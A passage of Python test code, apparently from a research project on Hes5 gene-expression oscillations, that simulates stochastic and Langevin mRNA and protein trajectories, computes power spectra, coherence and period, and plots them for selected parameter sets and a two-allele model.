repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1],
initial_mRNA = 10,
initial_protein = third_parameter[2],
equilibration_time = 1000,
synchronize = False )
third_langevin_mRNA_trajectories, third_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1],
initial_mRNA = 10,
initial_protein = third_parameter[2],
equilibration_time = 1000)
third_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1]
)
third_theoretical_coherence, third_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(third_theoretical_power_spectrum)
third_power_spectrum, third_coherence, third_period = hes5.calculate_power_spectrum_of_trajectories(third_protein_trajectories)
third_langevin_power_spectrum, third_langevin_coherence, third_langevin_period = hes5.calculate_power_spectrum_of_trajectories(third_langevin_protein_trajectories)
my_figure.add_subplot(525)
mrna_example, = plt.plot( third_mRNA_trajectories[:,0],
third_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( third_protein_trajectories[:,0],
third_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( third_langevin_mRNA_trajectories[:,0],
third_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( third_langevin_protein_trajectories[:,0],
third_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,9)
plt.text(0.1, 0.22, r'$\alpha_m =$ ' + '{:.2f}'.format(third_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(third_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(third_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(third_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(526)
for trajectory in third_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((third_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(third_power_spectrum[:,0],
third_power_spectrum[:,1], color = 'black')
plt.plot(third_langevin_power_spectrum[:,0],
third_langevin_power_spectrum[:,1], color = 'green')
plt.plot(third_theoretical_power_spectrum[:,0],
third_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurrence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(third_coherence) + ' ' +
"{:.2f}".format(third_langevin_coherence) + ' ' +
"{:.2f}".format(third_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(third_period) + ' ' +
"{:.2f}".format(third_langevin_period) + ' ' +
"{:.2f}".format(third_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes)
##
# fourth example
##
# generate the random samples:
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
# np.logical_and(model_results[:,0]<65000, #cell_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<0.5))))) #time_delay
# my_posterior_samples = prior_samples[accepted_indices]
fourth_parameter = my_posterior_samples[lowest_indices[3]]
fourth_mRNA_trajectories, fourth_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1],
initial_mRNA = 10,
initial_protein = fourth_parameter[2],
equilibration_time = 1000,
synchronize = False )
fourth_langevin_mRNA_trajectories, fourth_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1],
initial_mRNA = 10,
initial_protein = fourth_parameter[2],
equilibration_time = 1000)
fourth_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1]
)
fourth_theoretical_coherence, fourth_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(fourth_theoretical_power_spectrum)
fourth_power_spectrum, fourth_coherence, fourth_period = hes5.calculate_power_spectrum_of_trajectories(fourth_protein_trajectories)
fourth_langevin_power_spectrum, fourth_langevin_coherence, fourth_langevin_period = hes5.calculate_power_spectrum_of_trajectories(fourth_langevin_protein_trajectories)
my_figure.add_subplot(527)
mrna_example, = plt.plot( fourth_mRNA_trajectories[:,0],
fourth_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( fourth_protein_trajectories[:,0],
fourth_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( fourth_langevin_mRNA_trajectories[:,0],
fourth_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( fourth_langevin_protein_trajectories[:,0],
fourth_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,9)
plt.text(0.1, 0.34, r'$\alpha_m =$ ' + '{:.2f}'.format(fourth_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(fourth_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(fourth_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(fourth_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(528)
for trajectory in fourth_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((fourth_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(fourth_power_spectrum[:,0],
fourth_power_spectrum[:,1], color = 'black')
plt.plot(fourth_langevin_power_spectrum[:,0],
fourth_langevin_power_spectrum[:,1], color = 'green')
plt.plot(fourth_theoretical_power_spectrum[:,0],
fourth_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurrence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(fourth_coherence) + ' ' +
"{:.2f}".format(fourth_langevin_coherence) + ' ' +
"{:.2f}".format(fourth_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(fourth_period) + ' ' +
"{:.2f}".format(fourth_langevin_period) + ' ' +
"{:.2f}".format(fourth_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes)
##
# fifth example
##
# generate the random samples:
fifth_parameter = np.array([11.0,29.0,31400.0,29.0])
# fifth_parameter = my_posterior_samples[2]
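# note: this fifth example uses a hand-picked parameter set and a faster
# protein degradation rate (0.03/min) than the reference log(2)/90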
fifth_mRNA_trajectories, fifth_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1],
initial_mRNA = 10,
initial_protein = fifth_parameter[2],
equilibration_time = 1000,
synchronize = False )
fifth_langevin_mRNA_trajectories, fifth_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1],
initial_mRNA = 10,
initial_protein = fifth_parameter[2],
equilibration_time = 1000)
fifth_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1]
)
fifth_theoretical_coherence, fifth_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(fifth_theoretical_power_spectrum)
fifth_power_spectrum, fifth_coherence, fifth_period = hes5.calculate_power_spectrum_of_trajectories(fifth_protein_trajectories)
fifth_langevin_power_spectrum, fifth_langevin_coherence, fifth_langevin_period = hes5.calculate_power_spectrum_of_trajectories(fifth_langevin_protein_trajectories)
my_figure.add_subplot(529)
mrna_example, = plt.plot( fifth_mRNA_trajectories[:,0],
fifth_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( fifth_protein_trajectories[:,0],
fifth_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( fifth_langevin_mRNA_trajectories[:,0],
fifth_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( fifth_langevin_protein_trajectories[:,0],
fifth_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,15)
plt.text(0.1, 0.01, r'$\alpha_m =$ ' + '{:.2f}'.format(fifth_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(fifth_parameter[1]) +
r', $\mu_p =$ ' + '{:.2f}'.format(0.03) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(fifth_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(fifth_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(5,2,10)
for trajectory in fifth_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((fifth_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(fifth_power_spectrum[:,0],
fifth_power_spectrum[:,1], color = 'black')
plt.plot(fifth_langevin_power_spectrum[:,0],
fifth_langevin_power_spectrum[:,1], color = 'green')
plt.plot(fifth_theoretical_power_spectrum[:,0],
fifth_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurrence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.05, 0.95, 'Coherence:\n' + "{:.2f}".format(fifth_coherence) + ' ' +
"{:.2f}".format(fifth_langevin_coherence) + ' ' +
"{:.2f}".format(fifth_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(fifth_period) + ' ' +
"{:.2f}".format(fifth_langevin_period) + ' ' +
"{:.2f}".format(fifth_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='left',
transform=plt.gca().transAxes)
plt.tight_layout()
my_figure.legend((mrna_example, protein_example),
('mRNA*1000', 'Protein'),
loc = 'upper left', ncol = 2, fontsize = 10 )
plt.figtext(0.5, 0.975, 'Langevin', horizontalalignment='left', color = 'green')
plt.figtext(0.65, 0.975, 'Gillespie', horizontalalignment='left', color = 'black')
plt.figtext(0.8, 0.975, 'LNA', horizontalalignment='left', color = 'blue')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# plt.subplots_adjust(top = 0.9, hspace = 0.7)
plt.subplots_adjust(top = 0.95)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_low_transcription_rate_langevin_validation.pdf'))
def test_visualise_model_regimes(self):
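# Summary: for three coherence bands, plot ten example langevin traces of one
# accepted parameter point each, with the corresponding power spectrum and a
# +-10% band around its smoothed peak frequency underneath.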
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
number_of_traces = 10
figuresize = (6,2.5)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(1, 3 )
coherence_bands = [[0,0.1],
[0.2,0.3],
[0.5,0.6]]
panel_labels = {0: 'A', 1: 'B', 2: 'C'}
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1]))))))
my_posterior_results = model_results[accepted_indices]
my_posterior_samples = prior_samples[accepted_indices]
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[coherence_index],
height_ratios= [number_of_traces, 1])
# wspace = 5.0)
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
this_parameter = my_posterior_samples[0]
this_results = my_posterior_results[0]
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
hill_coefficient = this_parameter[4],
initial_protein = this_parameter[2],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(3,9)
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
plt.gca().text(-0.2, 2.1, panel_labels[coherence_index], transform=plt.gca().transAxes)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if subplot_index != number_of_traces - 1 or coherence_index != 0:
this_axis.yaxis.set_ticklabels([])
else:
plt.yticks([3,9])
if coherence_index == 0 and subplot_index == 4:
plt.ylabel('Expression/1e4 ', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks([3,9])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
this_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if coherence_index == 0:
plt.ylabel('Power', labelpad = 15)
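# mark a +-10% frequency band around the peak of the smoothed power spectrum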
max_index = np.argmax(smoothened_power_spectrum[:,1])
max_power_frequency = smoothened_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.7)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','model_visualisation.pdf'))
def xest_visualise_different_coherences(self):
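# Summary: same layout as the model-regime figure above, but for six
# coherence bands across two figures and up to three accepted parameter
# points per band.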
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
figure_coherence_bands = np.array([[[0.0,0.1],
[0.1,0.2],
[0.2,0.3]],
[[0.3,0.4],
[0.5,0.6],
[0.6,0.7]]])
number_of_traces = 10
for figure_index in range(2):
figuresize = (6,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(3, 3 )
coherence_bands = figure_coherence_bands[figure_index]
# [0.2,0.3],
# [0.3,0.4]]
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1]))))))
my_posterior_results = model_results[accepted_indices]
my_posterior_samples = prior_samples[accepted_indices]
for parameter_index in range(3):
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[coherence_index*3 + parameter_index],
height_ratios= [number_of_traces, 1])
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
try:
this_parameter = my_posterior_samples[parameter_index]
this_results = my_posterior_results[parameter_index]
except IndexError:
this_parameter = my_posterior_samples[0]
this_results = my_posterior_results[0]
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2],
hill_coefficient = this_parameter[4],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(4,8)
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if parameter_index !=0:
this_axis.yaxis.set_ticklabels([])
if parameter_index == 0 and subplot_index == 5:
plt.ylabel('Expression/1e4', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks([4,8])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
hill_coefficient = this_parameter[4],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
equilibration_time = 1000)
this_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
plt.plot(smoothened_power_spectrum[:,0], smoothened_power_spectrum[:,1],
color = 'grey' )
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if parameter_index == 0:
plt.ylabel('Power', labelpad = 15)
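# mark a +-10% frequency band around the peak of the smoothed power spectrum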
max_index = np.argmax(smoothened_power_spectrum[:,1])
max_power_frequency = smoothened_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.figtext(0.5,0.98,r'Coherence $\in$ '
+ np.array_str(coherence_bands[0,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.65,r'Coherence $\in$ '
+ np.array_str(coherence_bands[1,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.32,r'Coherence $\in$ '
+ np.array_str(coherence_bands[2,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.5)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','coherence_visualisation_' +
str(figure_index) + '.pdf'))
def xest_visualise_heterozygous_model(self):
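# Summary: simulate two independently fluctuating alleles, plot their summed
# ('homozygous') signal and each allele separately for three realisations,
# together with the corresponding power spectra.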
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
figuresize = (7,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(2, 3 )
for parameter_index in range(6):
this_parameter_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[parameter_index], height_ratios=[3,1],
hspace=0.3)
this_parameter = my_posterior_samples[parameter_index]
this_model_results = my_model_results[parameter_index]
_, these_traces_1, _, these_traces_2 = hes5.generate_multiple_heterozygous_langevin_trajectories(
number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
these_compound_traces = np.zeros_like(these_traces_1)
these_compound_traces[:,0] = these_traces_1[:,0]
these_compound_traces[:,1:] = these_traces_1[:,1:]+these_traces_2[:,1:]
this_compound_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_compound_traces)
this_allele_1_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces_1)
this_allele_2_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces_2)
this_upper_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_parameter_grid[0])
for realisation_index in range(3):
this_realisation_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_upper_grid[realisation_index], hspace = 0.0)
this_homozygous_axis = plt.Subplot(my_figure, this_realisation_grid[0])
my_figure.add_subplot(this_homozygous_axis)
this_homozygous_axis.plot(these_compound_traces[:,0],
these_compound_traces[:,realisation_index + 1]/10000,
color = 'black')
plt.xlim(0,1500)
plt.ylim(4.5,8.5)
this_homozygous_axis.locator_params(axis='x', tight = True, nbins=3)
this_homozygous_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
if realisation_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_model_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 7)
this_allele_axis_1 = plt.Subplot(my_figure, this_realisation_grid[1])
my_figure.add_subplot(this_allele_axis_1)
this_allele_axis_1.plot(these_traces_1[:,0],
these_traces_1[:,realisation_index + 1]/10000,
color = 'green')
plt.ylim(1.5,5.5)
plt.xlim(0,1500)
this_allele_axis_1.locator_params(axis='x', tight = True, nbins=3)
this_allele_axis_1.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
if parameter_index in [0,3] and realisation_index == 1:
plt.ylabel("Expression/1e4")
this_allele_axis_2 = plt.Subplot(my_figure, this_realisation_grid[2])
my_figure.add_subplot(this_allele_axis_2)
this_allele_axis_2.plot(these_traces_2[:,0],
these_traces_2[:,realisation_index + 1]/10000,
color = 'blue')
plt.ylim(1.5,5.5)
plt.xlim(0,1500)
this_allele_axis_2.locator_params(axis='x', tight = True, nbins=3)
this_allele_axis_2.locator_params(axis='y', tight = True, nbins=3)
if realisation_index != 2:
plt.gca().xaxis.set_ticklabels([])
else:
plt.xlabel("Time [min]")
this_power_spectrum_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_parameter_grid[1], hspace = 0.0)
homozygous_power_spectrum_axis = plt.Subplot(my_figure,this_power_spectrum_grid[0])
my_figure.add_subplot(homozygous_power_spectrum_axis)
homozygous_power_spectrum_axis.plot(this_compound_power_spectrum[:,0],
this_compound_power_spectrum[:,1],
color = 'black')
plt.xlim(0,0.01)
homozygous_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
homozygous_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
plt.gca().yaxis.set_ticklabels([])
if parameter_index == 0:
plt.text(0.03, 0.6, 'Homozygous',
fontsize = 7,
color = 'black',
transform=plt.gca().transAxes)
allele_1_power_spectrum_axis = plt.Subplot(my_figure, this_power_spectrum_grid[1])
my_figure.add_subplot(allele_1_power_spectrum_axis)
allele_1_power_spectrum_axis.plot(this_allele_1_power_spectrum[:,0],
this_allele_1_power_spectrum[:,1],
color = 'green')
plt.xlim(0,0.01)
allele_1_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
allele_1_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
plt.gca().yaxis.set_ticklabels([])
